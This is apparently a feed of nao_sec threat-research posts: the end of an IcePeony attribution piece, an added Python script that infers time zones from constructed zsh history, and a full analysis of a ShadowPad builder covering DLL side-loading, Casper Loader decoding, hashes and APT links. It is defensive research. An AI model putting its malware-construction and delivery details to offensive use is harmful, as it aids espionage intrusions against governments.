They are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter this influence.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/24.png" alt="" /></p> <p><a href="https://www.mea.gov.in/newsdetail1.htm?12042/">https://www.mea.gov.in/newsdetail1.htm?12042/</a></p> <p>We summarize the attribution information using the Diamond Model.</p> <p>IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system.</p> <p>They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. Additionally, the governments and education sectors in Mauritius and Vietnam were also targeted.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/25.png" alt="" /></p> <h2 id="wrap-up">Wrap-Up</h2> <p>In this blog post, we introduced IcePeony. IcePeony is a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam.</p> <p>The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL Injection attacks on publicly accessible web servers. If vulnerabilities are found, they install web shells or execute malware. Ultimately, they aim to steal credentials.</p> <p>We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. 
They remain active, and we must continue monitoring their activities closely moving forward.</p> <h2 id="iocs">IoCs</h2> <h3 id="ip">IP</h3> <h3 id="domain">Domain</h3> <h3 id="icecache-1">IceCache</h3> <h3 id="iceevent-1">IceEvent</h3>
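<p>The Attribution section above infers the operator’s time zone and working hours from zsh_history timestamps. The script below is an added example, not nao_sec’s code or data: it parses zsh extended-history records, builds hour-of-day and weekday histograms under a hypothesised UTC offset, and ranks candidate offsets by how much of the activity lands inside a normal working day. The history lines it analyses are constructed for illustration.</p>

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# zsh EXTENDED_HISTORY records look like ": <epoch>:<elapsed seconds>;<command>"
ZSH_EXTENDED = re.compile(r"^: (?P<epoch>\d+):(?P<elapsed>\d+);(?P<cmd>.*)$")
WEEKDAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]


def parse_zsh_history(text):
    """Return [(aware UTC datetime, command)] for every timestamped record.

    Plain command lines (history kept without EXTENDED_HISTORY) and junk carry
    no timestamp, so they cannot be placed on a timeline and are skipped.
    """
    events = []
    for line in text.splitlines():
        m = ZSH_EXTENDED.match(line)
        if m:
            ts = datetime.fromtimestamp(int(m["epoch"]), tz=timezone.utc)
            events.append((ts, m["cmd"]))
    return events


def activity_profile(events, utc_offset_hours):
    """Count activity per local hour and per local weekday, assuming the
    operator sits in UTC+utc_offset_hours."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    hours, weekdays = Counter(), Counter()
    for ts, _cmd in events:
        local = ts.astimezone(tz)
        hours[local.hour] += 1
        weekdays[WEEKDAYS[local.weekday()]] += 1
    return hours, weekdays


def working_window(hours):
    """Earliest and latest local hour with any activity, e.g. (8, 21)."""
    active = [h for h, n in hours.items() if n > 0]
    return (min(active), max(active)) if active else None


def share_in_window(events, utc_offset_hours, start=8, end=22):
    """Fraction of commands falling inside [start, end) local time under the
    given offset. A plausible time zone packs nearly all activity into a
    normal working day; a wrong one smears it across the night."""
    if not events:
        return 0.0
    hours, _ = activity_profile(events, utc_offset_hours)
    return sum(n for h, n in hours.items() if start <= h < end) / len(events)


def rank_offsets(events, start=8, end=22):
    """Candidate UTC offsets, best first, by share of activity inside the
    working-day window. A heuristic for attribution, not proof."""
    scored = [(off, share_in_window(events, off, start, end))
              for off in range(-12, 15)]
    return sorted(scored, key=lambda pair: -pair[1])


# Constructed sample (not real attacker data): commands typed between 08:00 and
# 22:00 UTC+8, Monday 2023-10-16 to Saturday 2023-10-21, nothing on Sunday.
_SAMPLE_TZ = timezone(timedelta(hours=8))
_SAMPLE_LOCAL_EVENTS = [
    ("2023-10-16 08:05", "ls -la"), ("2023-10-16 13:40", "vim notes.txt"),
    ("2023-10-16 21:55", "exit"), ("2023-10-17 09:10", "git status"),
    ("2023-10-17 18:30", "python3 report.py"), ("2023-10-18 10:00", "cat README"),
    ("2023-10-18 20:15", "tar czf out.tgz logs/"), ("2023-10-19 08:30", "ls"),
    ("2023-10-19 15:45", "cd /tmp"), ("2023-10-20 11:20", "ls"),  # lighter Friday
    ("2023-10-21 14:00", "git status"),  # lighter Saturday
]


def render_zsh_history(local_events, tz=_SAMPLE_TZ, elapsed=0):
    """Render (local time, command) pairs as extended-history lines; the epoch
    zsh stores is UTC, so the local zone is folded in here."""
    lines = []
    for when, cmd in local_events:
        local = datetime.strptime(when, "%Y-%m-%d %H:%M").replace(tzinfo=tz)
        lines.append(f": {int(local.timestamp())}:{elapsed};{cmd}")
    return "\n".join(lines) + "\n"


# A bare command and a stray comment are mixed in to exercise the skip path.
SAMPLE_HISTORY = "ls\n# not a history record\n" + render_zsh_history(_SAMPLE_LOCAL_EVENTS)

if __name__ == "__main__":
    events = parse_zsh_history(SAMPLE_HISTORY)
    hours, weekdays = activity_profile(events, 8)
    print("UTC+8 working window:", working_window(hours))
    print("Per weekday:", {d: weekdays[d] for d in WEEKDAYS})
    for off, share in rank_offsets(events)[:3]:
        print(f"UTC{off:+d}: {share:.0%} of commands inside 08:00-22:00")
```

On the constructed sample, UTC+8 is the only offset that places every command inside 08:00-22:00; the same records read in UTC smear across 00:00-13:00, which is the kind of shift the Attribution section relies on.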
  55. Building Casper’s Shadow

    Sun, 30 Jun 2024 15:00:00 -0000

    <p><img src="https://nao-sec.org/assets/2024-07-01/top.png" alt="" /></p> <h2 id="introduction">Introduction</h2> <p>A few days ago, we came across a peculiar file. It looked like some kind of builder, and a quick glance at the settings piqued our interest. It appeared to be a ShadowPad builder, probably created around 2021.</p> <p>ShadowPad builders became a topic of conversation around the time of the i-Soon leak, but we had never seen the actual builder ourselves. This is likely true for most of you as well.</p> <p>We were so intrigued that we carefully investigated this builder and reviewed past attack campaigns. In this article, we will share how attackers build ShadowPad, what we discovered through our investigation, and our insights.</p> <p>Our investigation is still ongoing. We would love to engage in active discussions with you. If you have any opinions or comments, please feel free to contact us.</p> <p>[Note] What we discovered this time is a builder. It does not include a controller. Therefore, it is not possible to control what is generated by this builder. In other words, this builder alone is not meaningful in the real world.</p> <h2 id="background">Background</h2> <p>In June 2024, we happened to read a research memo from a year ago. We often read past memos for a change of pace. In doing so, we recalled an attack on Kyrgyzstan in April 2023.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/1.png" alt="" /></p> <p><a href="https://x.com/nao_sec/status/1648960199938707456">https://x.com/nao_sec/status/1648960199938707456</a></p> <p>This attack involved a file resembling a RoyalRoad RTF, which prompted our investigation at the time. Opening this RTF file with a vulnerable version of Microsoft Word displayed a decoy file related to Kyrgyzstan’s cybersecurity, while simultaneously writing and executing several files to the disk. 
As a result, a CobaltStrike beacon was executed.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/2.png" alt="" /></p> <p>The loader that decrypted and executed the beacon resembled Casper Loader. Casper Loader is familiar to threat researchers specializing in East Asia and has been reported to be used in attacks by Tick<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup><sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. Our friend @aRtAGGI conducted similar analyses at the time.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/3.png" alt="" /></p> <p><a href="https://x.com/aRtAGGI/status/1649184131090087938">https://x.com/aRtAGGI/status/1649184131090087938</a></p> <p>We later found that a similar attack had been carried out against Kazakhstan after searching our past database. The attack on Kazakhstan was older than the one on Kyrgyzstan, occurring around November 2022. In this case, the same loader executed from the RTF file eventually ran the CobaltStrike beacon.</p> <p>Information about the RTF files used in the attacks on Kyrgyzstan and Kazakhstan is listed in the IoC sheet from our previous research on RoyalRoad RTF<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup><sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>. We have identified these as <code class="language-plaintext highlighter-rouge">U-4</code>. If you are interested, please refer to the IoC sheet.</p> <p><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></p> <p>Let’s return to the present. 
To investigate recent attack samples, we executed a search query based on the characteristics of the loader used in the attack on Kyrgyzstan.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2 </code></pre></div></div> <p>We found an unusual file posted in May 2024. This data was embedded in the resource section of another file. We downloaded and executed the original file. To our surprise, it was a ShadowPad builder.</p> <h2 id="caspervmakerhttpx86">CasperVMakerHTTPx86</h2> <table> <tbody> <tr> <td>MD5</td> <td>eb99580e0d90ee61b3e2e3bd8715c633</td> </tr> <tr> <td>SHA-1</td> <td>706482eda6d747ca2688cdfd97399f800da9e73c</td> </tr> <tr> <td>SHA-256</td> <td>b6d7c456423c871c7ffe418069a75c39055e4e3d023021c8b0885a02c7ce93c6</td> </tr> </tbody> </table> <p><img src="https://nao-sec.org/assets/2024-07-01/5.png" alt="" /></p> <p>When launching the ShadowPad builder, which calls itself CasperVMakerHTTPx86, the following screen appears. There are several tabs, each with various settings.</p> <ul> <li>First</li> <li>Install</li> <li>Inject</li> <li>Online</li> <li>Proxy</li> <li>DNS</li> </ul> <p>These items are very similar to the reported architecture of ShadowPad<sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup>. This suggests that these tabs are configuration items for each module. The settings for each item are as follows:</p> <p><img src="https://nao-sec.org/assets/2024-07-01/6.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/7.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/8.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/9.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/10.png" alt="" /></p> <p>Let’s try building ShadowPad. By clicking the “Build EXE x86” button, ShadowPad is generated. 
If the build is successful, an EXE file and a DLL file are created.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/11.png" alt="" /></p> <p>The EXE file is a legitimate AppLaunch. It loads the mscoree.dll in the same directory via DLL Side-Loading. The DLL file is the Casper Loader, which decodes and executes the ShadowPad shellcode stored internally.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/12.png" alt="" /></p> <h2 id="comparison-with-similar-samples">Comparison with Similar Samples</h2> <p>ShadowPad loaders exhibit several patterns, but those generated using this builder are decoded using a custom XOR with constants.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/13.png" alt="" /></p> <p>There are many samples with similar characteristics, but we will introduce two of them.</p> <h3 id="sample-1">Sample-1</h3> <p>According to Macnica’s report<sup id="fnref:2:1" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>, Tick uses Casper Loader to execute ShadowPad. Comparing this Casper Loader with the loader created using the builder reveals that while the Macnica sample contains junk code and different fixed values, the algorithm is the same.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/14.png" alt="" /></p> <h3 id="sample-2">Sample-2</h3> <p>A report released by the FBI in December 2021<sup id="fnref:6" role="doc-noteref"><a href="#fn:6" class="footnote" rel="footnote">6</a></sup> reported an attack exploiting CVE-2021-44515 where ShadowPad was used. The AppLaunch.exe and mscoree.dll in this case used Casper Loader to execute ShadowPad.</p> <p>Comparing this Casper Loader with the one created using the builder shows that the algorithm and fixed values are identical. 
Although API Hashing is not used, it is a highly similar sample.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/15.png" alt="" /></p> <h2 id="shadowpad-community">ShadowPad Community</h2> <p>As you know, ShadowPad is commercial software sold for profit. According to SentinelOne’s report from 2021<sup id="fnref:5:1" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup>, ShadowPad is sold to various targeted attack groups, and there is speculation that whg and Rose are involved in its development. The i-Soon leak in February 2024 reported that i-Soon was selling software that appeared to be ShadowPad (including source code and training)<sup id="fnref:7" role="doc-noteref"><a href="#fn:7" class="footnote" rel="footnote">7</a></sup>.</p> <p>As various researchers have reported<sup id="fnref:2:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup><sup id="fnref:5:2" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup><sup id="fnref:6:1" role="doc-noteref"><a href="#fn:6" class="footnote" rel="footnote">6</a></sup><sup id="fnref:8" role="doc-noteref"><a href="#fn:8" class="footnote" rel="footnote">8</a></sup><sup id="fnref:9" role="doc-noteref"><a href="#fn:9" class="footnote" rel="footnote">9</a></sup><sup id="fnref:10" role="doc-noteref"><a href="#fn:10" class="footnote" rel="footnote">10</a></sup><sup id="fnref:11" role="doc-noteref"><a href="#fn:11" class="footnote" rel="footnote">11</a></sup><sup id="fnref:12" role="doc-noteref"><a href="#fn:12" class="footnote" rel="footnote">12</a></sup><sup id="fnref:13" role="doc-noteref"><a href="#fn:13" class="footnote" rel="footnote">13</a></sup><sup id="fnref:14" role="doc-noteref"><a href="#fn:14" class="footnote" rel="footnote">14</a></sup><sup id="fnref:15" role="doc-noteref"><a href="#fn:15" class="footnote" rel="footnote">15</a></sup><sup id="fnref:16" role="doc-noteref"><a href="#fn:16" class="footnote" rel="footnote">16</a></sup><sup 
id="fnref:17" role="doc-noteref"><a href="#fn:17" class="footnote" rel="footnote">17</a></sup><sup id="fnref:18" role="doc-noteref"><a href="#fn:18" class="footnote" rel="footnote">18</a></sup><sup id="fnref:19" role="doc-noteref"><a href="#fn:19" class="footnote" rel="footnote">19</a></sup><sup id="fnref:20" role="doc-noteref"><a href="#fn:20" class="footnote" rel="footnote">20</a></sup><sup id="fnref:21" role="doc-noteref"><a href="#fn:21" class="footnote" rel="footnote">21</a></sup><sup id="fnref:22" role="doc-noteref"><a href="#fn:22" class="footnote" rel="footnote">22</a></sup><sup id="fnref:23" role="doc-noteref"><a href="#fn:23" class="footnote" rel="footnote">23</a></sup><sup id="fnref:24" role="doc-noteref"><a href="#fn:24" class="footnote" rel="footnote">24</a></sup><sup id="fnref:25" role="doc-noteref"><a href="#fn:25" class="footnote" rel="footnote">25</a></sup><sup id="fnref:26" role="doc-noteref"><a href="#fn:26" class="footnote" rel="footnote">26</a></sup><sup id="fnref:27" role="doc-noteref"><a href="#fn:27" class="footnote" rel="footnote">27</a></sup><sup id="fnref:28" role="doc-noteref"><a href="#fn:28" class="footnote" rel="footnote">28</a></sup><sup id="fnref:29" role="doc-noteref"><a href="#fn:29" class="footnote" rel="footnote">29</a></sup><sup id="fnref:30" role="doc-noteref"><a href="#fn:30" class="footnote" rel="footnote">30</a></sup><sup id="fnref:31" role="doc-noteref"><a href="#fn:31" class="footnote" rel="footnote">31</a></sup><sup id="fnref:32" role="doc-noteref"><a href="#fn:32" class="footnote" rel="footnote">32</a></sup><sup id="fnref:33" role="doc-noteref"><a href="#fn:33" class="footnote" rel="footnote">33</a></sup><sup id="fnref:34" role="doc-noteref"><a href="#fn:34" class="footnote" rel="footnote">34</a></sup><sup id="fnref:35" role="doc-noteref"><a href="#fn:35" class="footnote" rel="footnote">35</a></sup><sup id="fnref:36" role="doc-noteref"><a href="#fn:36" class="footnote" rel="footnote">36</a></sup><sup id="fnref:37" 
role="doc-noteref"><a href="#fn:37" class="footnote" rel="footnote">37</a></sup><sup id="fnref:38" role="doc-noteref"><a href="#fn:38" class="footnote" rel="footnote">38</a></sup>, many targeted attack groups use ShadowPad. These can be broadly categorized into two groups: attack groups associated with the MSS, like APT41, and those associated with the PLA, like Tick.</p> <p>As previously mentioned, it is generally believed that whg and Rose were involved in ShadowPad’s development. There is no compelling reason to refute this, so we will proceed with this assumption. According to a U.S. government report related to APT41<sup id="fnref:39" role="doc-noteref"><a href="#fn:39" class="footnote" rel="footnote">39</a></sup>, Rose (Tan Dailin) was involved in APT41. Seven individuals were indicted for their involvement with APT41, with Rose (and Zhang Haoran) being particularly noted for their involvement in both BARIUM and LEAD, making them key figures in APT41’s activities. This background suggests that BARIUM was the earliest adopter of ShadowPad, followed by LEAD.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/16.png" alt="" /></p> <p>In contrast, the PLA has many more attack groups using ShadowPad than the MSS. This is generally because many researchers have given them different names, and their relationships are not sufficiently organized. If you are a researcher, you probably have more organized information in your mind (or within your organization). Of course, we understand and accept this. However, to keep things simple, we will exclude such discussions in this article and share how we organized this information within nao_sec. Interestingly, all these attack groups used the RoyalRoad RTF Weaponizer. Is this just a coincidence? 
ShadowPad and RoyalRoad RTF Weaponizer may be shared through the same channels.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/17.png" alt="" /></p> <h2 id="conclusion">Conclusion</h2> <p>In this article, we introduced the ShadowPad builder. ShadowPad, widely used by various targeted attack groups as a successor to PlugX, had limited information available about its builder until now. This article sheds light on how attackers build ShadowPad.</p> <p>We also organized the relationships between attack groups using ShadowPad. Our research is still ongoing. We would love to engage in active discussions. If you have any opinions or comments, please contact us. We look forward to hearing from you.</p> <h2 id="acknowledgments">Acknowledgments</h2> <p>We received a lot of help from our friends in writing this article. While we won’t name individuals here, we are immensely grateful to the many supportive reviewers. We want to take this opportunity to express our deepest gratitude to you.</p> <h2 id="references">References</h2> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>TrendMicro, “Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data”, https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>マクニカ, “標的型攻撃の実態と対策アプローチ 第5版 日本を狙うサイバーエスピオナージの動向 2020年度”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5.pdf <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a> <a href="#fnref:2:1" class="reversefootnote" role="doc-backlink">&#8617;<sup>2</sup></a> <a href="#fnref:2:2" class="reversefootnote" role="doc-backlink">&#8617;<sup>3</sup></a></p> </li> <li id="fn:3" role="doc-endnote"> <p>nao_sec, “An Overhead View 
of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:4" role="doc-endnote"> <p>nao_sec, “Royal Road! Re:Dive”, https://nao-sec.org/2021/01/royal-road-redive.html <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:5" role="doc-endnote"> <p>SentinelOne, “ShadowPad A Masterpiece of Privately Sold Malware in Chinese Espionage”, https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/ <a href="#fnref:5" class="reversefootnote" role="doc-backlink">&#8617;</a> <a href="#fnref:5:1" class="reversefootnote" role="doc-backlink">&#8617;<sup>2</sup></a> <a href="#fnref:5:2" class="reversefootnote" role="doc-backlink">&#8617;<sup>3</sup></a></p> </li> <li id="fn:6" role="doc-endnote"> <p>FBI, “APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central”, https://www.ic3.gov/Media/News/2021/211220.pdf <a href="#fnref:6" class="reversefootnote" role="doc-backlink">&#8617;</a> <a href="#fnref:6:1" class="reversefootnote" role="doc-backlink">&#8617;<sup>2</sup></a></p> </li> <li id="fn:7" role="doc-endnote"> <p>HarfangLab, “A comprehensive analysis of I-Soon’s commercial offering”, https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ <a href="#fnref:7" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:8" role="doc-endnote"> <p>Kaspersky, “ShadowPad in corporate networks”, https://securelist.com/shadowpad-in-corporate-networks/81432/ <a href="#fnref:8" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:9" role="doc-endnote"> <p>Kaspersky, “Operation ShadowHammer”, https://securelist.com/operation-shadowhammer/89992/ <a href="#fnref:9" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:10" role="doc-endnote"> <p>ESET, “Connecting the dots: Exposing the arsenal 
and methods of the Winnti Group”, https://www.welivesecurity.com/2019/10/14/connecting-dots-exposing-arsenal-methods-winnti/ <a href="#fnref:10" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:11" role="doc-endnote"> <p>ESET, “Winnti Group targeting universities in Hong Kong”, https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ <a href="#fnref:11" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:12" role="doc-endnote"> <p>マクニカ, “標的型攻撃の実態と対策アプローチ 第4版 日本を狙うサイバーエスピオナージの動向 2019年度下期”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2019_4.pdf <a href="#fnref:12" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:13" role="doc-endnote"> <p>PwC, “Around the world in 80 days 4.2bn packets”, https://www.youtube.com/watch?v=YCwyc6SctYs <a href="#fnref:13" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:14" role="doc-endnote"> <p>CrowdStrike, “Manufacturing Industry in the Adversaries’ Crosshairs”, https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ <a href="#fnref:14" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:15" role="doc-endnote"> <p>Kaspersky, “APT trends report Q2 2020”, https://securelist.com/apt-trends-report-q2-2020/97937/ <a href="#fnref:15" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:16" role="doc-endnote"> <p>Positive Technologies, “ShadowPad: new activity from the Winnti group”, https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf <a href="#fnref:16" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:17" role="doc-endnote"> <p>Symantec, “APT41: Indictments Put Chinese Espionage Group in the Spotlight”, https://symantec-enterprise-blogs.security.com/threat-intelligence/apt41-indictments-china-espionage <a href="#fnref:17" 
class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:18" role="doc-endnote"> <p>Dr.Web, “Study of the ShadowPad APT backdoor and its relation to PlugX”, https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf <a href="#fnref:18" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:19" role="doc-endnote"> <p>TrendMicro, “Earth Akhlut: Exploring the Tools, Tactics, and Procedures of an Advanced Threat Actor Operating a Large Infrastructure”, https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf <a href="#fnref:19" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:20" role="doc-endnote"> <p>ESET, “Operation StealthyTrident: corporate software under attack”, https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ <a href="#fnref:20" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:21" role="doc-endnote"> <p>Positive Technologies, “Higaisa or Winnti? 
APT41 backdoors, old and new”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ <a href="#fnref:21" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:22" role="doc-endnote"> <p>Recorded Future, “China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions”, https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf <a href="#fnref:22" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:23" role="doc-endnote"> <p>Recorded Future, “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling”, https://www.recordedfuture.com/blog/chinese-group-tag-22-targets-nepal-philippines-taiwan <a href="#fnref:23" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:24" role="doc-endnote"> <p>TrendMicro, “Delving Deep: An Analysis of Earth Lusca’s Operations”, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf <a href="#fnref:24" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:25" role="doc-endnote"> <p>Secureworks, “ShadowPad Malware Analysis”, https://www.secureworks.com/research/shadowpad-malware-analysis <a href="#fnref:25" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:26" role="doc-endnote"> <p>Recorded Future, “Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group”, https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf <a href="#fnref:26" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:27" role="doc-endnote"> <p>SentinelOne, “Moshen Dragon’s Triad-and-Error Approach Abusing Security Software to Sideload PlugX and ShadowPad”, 
https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ <a href="#fnref:27" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:28" role="doc-endnote"> <p>TeamT5, “The Next Gen PlugX - ShadowPad - A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT”, https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf <a href="#fnref:28" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:29" role="doc-endnote"> <p>Positive Technologies, “Space Pirates: analyzing the tools and connections of a new hacker group”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ <a href="#fnref:29" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:30" role="doc-endnote"> <p>Kaspersky, “Attacks on industrial control systems using ShadowPad”, https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ <a href="#fnref:30" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:31" role="doc-endnote"> <p>ESET, “Worok: The big picture”, https://www.welivesecurity.com/2022/09/06/worok-big-picture/ <a href="#fnref:31" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:32" role="doc-endnote"> <p>Elastic, “Update to the REF2924 intrusion set and related campaigns”, https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns <a href="#fnref:32" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:33" role="doc-endnote"> <p>Symantec, “Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors”, https://symantec-enterprise-blogs.security.com/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor <a href="#fnref:33" class="reversefootnote" 
role="doc-backlink">&#8617;</a></p> </li> <li id="fn:34" role="doc-endnote"> <p>TrendMicro, “Possible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad”, https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html <a href="#fnref:34" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:35" role="doc-endnote"> <p>Recorded Future, “RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale”, https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf <a href="#fnref:35" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:36" role="doc-endnote"> <p>Symantec, “Redfly: Espionage Actors Continue to Target Critical Infrastructure”, https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks <a href="#fnref:36" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:37" role="doc-endnote"> <p>Palo Alto Networks, “Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda”, https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ <a href="#fnref:37" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:38" role="doc-endnote"> <p>TrendMicro, “Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks”, https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html <a href="#fnref:38" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:39" role="doc-endnote"> <p>United States Department of Justice, “Seven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally”, https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer <a href="#fnref:39" class="reversefootnote" 
role="doc-backlink">&#8617;</a></p> </li> </ol> </div>
  56. GroundPeony: Crawling with Malice

    Tue, 22 Aug 2023 03:00:00 -0000

